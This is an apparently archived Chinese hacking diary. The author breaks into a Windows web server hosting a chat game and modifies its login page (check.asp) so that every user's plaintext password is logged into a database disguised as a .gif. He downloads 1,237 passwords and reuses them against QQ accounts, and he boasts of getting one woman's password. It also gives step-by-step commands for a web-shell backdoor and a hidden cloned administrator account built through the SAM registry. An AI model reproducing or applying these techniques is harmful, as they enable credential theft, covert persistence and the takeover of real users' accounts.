📄 入侵日记一则.html
字号:
没有启动 Server 服务。<br />
<br />
是否可以启动? (Y/N) [Y]: y<br />
Server 服务正在启动 .<br />
Server 服务已经启动成功。<br />
<br />
<br />
共享名 资源 注释<br />
<br />
-----------------------------------------------------<br />
IPC$ 远程 IPC<br />
D$ D:\ 默认共享<br />
G$ G:\ 默认共享<br />
F$ F:\ 默认共享<br />
ADMIN$ D:\WINDOWS 远程管理<br />
C$ C:\ 默认共享<br />
E$ E:\ 默认共享<br />
<br />
运用脚本打开终端服务,具体请参看caozhe(草哲)的<<一次简单的3389入侵过程>><br />
c:\>cscript rots.vbe 192.168.0.1 guest "password123" 3389 /fr<br />
<br />
等待几分钟后,系统重启......<br />
好了,现在回到正题,目标是江湖密码,但是它使用了md5加密,因此需要使用WEB欺骗,于是先用access建了一个<br />
<br />
xajhlogo.mdb 数据库表为"用户密码",有三个段分别为"用户名","密码","oicq",然后修改为xajhlogo.gif.<br />
<br />
自己的机子上开一ftp服务(可用tftp32) 在对方机子上<br />
c:\>tftp -i 127.0.0.1 get xajhlogo.gif xajhlogo.gif //127.0.0.1为我的IP<br />
然后复制到 c:\www\xajh\images\xajhlogo.gif //减小可能被管理员怀疑的危险系数<br />
<br />
然后开始动手修改程序d:\www\xajh\check.asp 此文件为这个版本的江湖的校验文件.我修改后的内容如下<br />
.........<br />
name=Trim(Request("name"))<br />
password=Trim(Request("pass"))<br />
'上面是原来就有的<br />
.........<br />
Set conn=Server.CreateObject("ADODB.CONNECTION")<br />
Set rs=Server.CreateObject("ADODB.RecordSet")<br />
conn.open Application("sjjh_usermdb")<br />
password1=md5(password)<br />
sql="SELECT * FROM 用户 WHERE 姓名='"&name&"'"<br />
rs.open sql,conn,2,2<br />
if rs.Eof and rs.Bof then<br />
rs.close<br />
set rs=nothing<br />
conn.close<br />
set conn=nothing<br />
Response.Redirect "error.asp?id=423"<br />
response.end<br />
end if<br />
if rs("密码")<>password1 then<br />
rs.close<br />
set rs=nothing<br />
conn.close<br />
set conn=nothing<br />
Response.Redirect "error.asp?id=141"<br />
response.end<br />
end if<br />
'这一段其实是我修改了原来的江湖程序直接粘在这儿的,懒~ 不过需要注意到这里要用"password1" 不然后<br />
<br />
面'的密码验证的时候将成为 password=md5(md5(password)) ,这样就出错了.<br />
<br />
useroicq=rs("oicq")<br />
rs.close<br />
set rs=nothing<br />
conn.close<br />
set conn=nothing<br />
<br />
set conn=Server.CreateObject("ADODB.Connection")<br />
DBPath=Server.MapPath("images/xajhlogo.gif")<br />
Set rs=Server.CreateObject("ADODB.RecordSet")<br />
conn.Open "driver={Microsoft Access Driver (*.mdb)};dbq=" & DBPath<br />
rs.open "SELECT * FROM 用户密码 WHERE 用户名='" & name & "'",conn<br />
If not(Rs.Bof OR Rs.Eof) Then<br />
sql="Update 用户密码 Set 密码='" & password & "'" & "where 用户名='" & name & "'"<br />
conn.Execute sql<br />
rs.close<br />
set rs=nothing<br />
conn.close<br />
set conn=nothing <br />
else<br />
sql="Insert Into 用户密码 (用户名,密码,oicq) Values("<br />
sql=sql & "'" & name & "'" & ","<br />
sql=sql & "'" & password & "'" & ","<br />
sql=sql & "'" & useroicq & "'" & ")"<br />
conn.Execute sql<br />
rs.close<br />
set rs=nothing<br />
conn.close<br />
set conn=nothing<br />
end if<br />
.............<br />
'我上面加的程序都是在对方操作江湖数据库之前的,这样是为了防止同时操作两个数据库时出错<br />
'下面就是对方第一段开始操作数据库的程序<br />
'由于大家都是菜鸟,所以一点经验之谈就是,先在自己机子上测试好了,再传!!!<br />
Set conn=Server.CreateObject("ADODB.CONNECTION")<br />
Set rs=Server.CreateObject("ADODB.RecordSet")<br />
conn.open Application("sjjh_usermdb")<br />
<br />
.........<br />
<br />
至此,漫长的等待开始了............<br />
15 道数学题过后<br />
.........<br />
现在激动人心的时刻到来了,下载 <a href='http://xajh.xxx.com/images/xajhlogo.gif' target='_blank'>http://xajh.xxx.com/images/xajhlogo.gif</a>.<br />
改为 1.mdb 打开之后...........找到了她----- *** 的密码,哈哈,她的密码果然和QQ密码一样^O^<br />
<br />
经过测试(前100个密码,实有1237个用户密码), 竟然有5个人的QQ密码和江湖密码一样(由于用户的QQ号可能<br />
<br />
是乱填,因此可能更多,最好的办法,跟他们聊聊问问QQ号:D),对QQ密码的重视程度看来也不是很大,估计也没<br />
<br />
有申请密码保护,试了试,有2个人没有申请,呵呵.........开心吧:)<br />
<br />
至此,既高兴又伤心,高兴的是我得到了她的密码,伤心的是有N多的互联网用户对密码的重视程度或者密码安<br />
<br />
全意识薄弱(有的密码很复杂,但是QQ密码和聊天室密码仍然一样),还好,我不是恋Q狂^-^<br />
<br />
好,现在是后门,安一个cmd.asp 到 d:\www\xajh\images\config.asp.<br />
代码见附录,可以通过<a href='http://xajh.xxx.com/images/config.asp' target='_blank'>http://xajh.xxx.com/images/config.asp</a> 执行WEB命令<br />
<br />
<br />
<br />
<br />
大家一定注意到我没有使用克隆的管理员帐号,是因为由于克隆的管理员帐员都使用了同样的profiles,因此<br />
<br />
如果你不小心留了点什么记录(比如有些人喜欢在运行那打命令),那样会很容易引起管理员发现.因此慎用克<br />
<br />
隆的管理员帐号,但还是应该建立一个隐藏的管理员帐号作为后门.<br />
<br />
先建立 InternetUser$ 用户<br />
c:\>net user InternetUser$ password123 /add<br />
//后面加$ 是为了使在 控制台下用 net user 看不到.<br />
<br />
然后运行regedt32.exe(注意不是regedit.exe)<br />
先找到HKEY_LOCAL_MAICHINE\SAM\SAM 点击它 ,然后在菜单"安全"->"权限" 添加自己现在登录的帐户或组,<br />
<br />
把"权限"->"完全控制"->"允许"打上勾,然后确定.<br />
(比如刚才我们用guest登录,但它已经是administrators组的了,因此需要把ADMINISTRATORS组的也改为允许<br />
<br />
完全控制,而且下面的键,Domains,account,user都要逐级这样做.但如果前面没有更改guest用户的默认组,这<br />
<br />
里就没必要这么麻烦,一级一级的了)这样就可以直接读取本地sam的信息<br />
<br />
现在运行regedit.exe<br />
打开键 HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\InternetUser$<br />
查看默认键值为"0x3f1" 相应导出如下<br />
HKEY_LOCAL_MAICHINE\SAM\SAM\Domains\account\user\names\ASPNET$ 为InternetUser$.reg<br />
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1 为 3f1.reg<br />
HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000001F4 为 lf4.reg (Administrators的相应键)<br />
用记事本打开lf4.reg 找到如下的"F"的值,比如这个例子中如下<br />
<br />
<br />
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\<br />
00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\<br />
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\<br />
00,00,00,00,00,00,00<br />
<br />
把其复制后,打开3f1.reg,找到"F"的值,将其删除,然后把上面的那段粘贴.<br />
打开aspnet$.reg,把里面的内容,比如这个例子中如下面这段复制<br />
<br />
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\InternetUser$]<br />
@=hex(3f1):<br />
<br />
回到3f1.reg 粘贴上面这段到文件最后,最后生成的文件内容如下<br />
Windows Registry Editor Version 5.00<br />
<br />
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\000003F1]<br />
"F"=hex:02,00,01,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,00,\<br />
00,20,97,b7,13,99,50,c2,01,ff,ff,ff,ff,ff,ff,ff,7f,40,6e,43,73,9f,50,c2,01,\<br />
f4,01,00,00,01,02,00,00,10,02,00,00,00,00,00,00,01,00,00,00,01,00,00,00,00,\<br />
00,00,00,00,00,00,00<br />
"V"=hex:00,00,00,00,d4,00,00,00,02,00,01,00,d4,00,00,00,1a,00,00,00,00,00,00,\<br />
00,f0,00,00,00,10,00,00,00,00,00,00,00,00,01,00,00,12,00,00,00,00,00,00,00,\<br />
14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,\<br />
01,00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,\<br />
00,00,00,00,00,00,00,00,00,00,14,01,00,00,00,00,00,00,00,00,00,00,14,01,00,\<br />
00,00,00,00,00,00,00,00,00,14,01,00,00,15,00,00,00,a8,00,00,00,2c,01,00,00,\<br />
08,00,00,00,01,00,00,00,34,01,00,00,14,00,00,00,00,00,00,00,48,01,00,00,14,\<br />
00,00,00,00,00,00,00,5c,01,00,00,04,00,00,00,00,00,00,00,60,01,00,00,04,00,\<br />
00,00,00,00,00,00,01,00,14,80,b4,00,00,00,c4,00,00,00,14,00,00,00,44,00,00,\<br />
00,02,00,30,00,02,00,00,00,02,c0,14,00,44,00,05,01,01,01,00,00,00,00,00,01,\<br />
00,00,00,00,02,c0,14,00,ff,07,0f,00,01,01,00,00,00,00,00,05,07,00,00,00,02,\<br />
00,70,00,04,00,00,00,00,00,14,00,1b,03,02,00,01,01,00,00,00,00,00,01,00,00,\<br />
00,00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,\<br />
00,00,00,18,00,ff,07,0f,00,01,02,00,00,00,00,00,05,20,00,00,00,24,02,00,00,\<br />
00,00,24,00,04,00,02,00,01,05,00,00,00,00,00,05,15,00,00,00,b4,b7,cd,22,dd,\<br />
e8,e4,1c,be,04,3e,32,e8,03,00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,\<br />
00,00,01,02,00,00,00,00,00,05,20,00,00,00,20,02,00,00,48,00,65,00,6c,00,70,\<br />
00,41,00,73,00,73,00,69,00,73,00,74,00,61,00,6e,00,74,00,00,00,dc,8f,0b,7a,\<br />
4c,68,62,97,a9,52,4b,62,10,5e,37,62,d0,63,9b,4f,dc,8f,0b,7a,4f,53,a9,52,84,\<br />
76,10,5e,37,62,01,00,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,ff,\<br />
ff,ff,ff,88,d7,f1,01,02,00,00,07,00,00,00,01,00,01,00,db,57,a2,94,f8,41,63,\<br />
fa,2c,88,d7,f1,cd,99,cf,0d,01,00,01,00,a0,05,70,54,f3,45,3e,4a,64,95,ef,6c,\<br />
37,f1,02,cf,01,00,01,00,01,00,01,00<br />
<br />
<br />
[HKEY_LOCAL_MACHINE\SAM\SAM\Domains\Account\Users\Names\InternetUser$]<br />
@=hex(3f1):<br />
<br />
保存后,将InternetUser$用户删除<br />
c:\>net user InternetUser$ /delete<br />
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -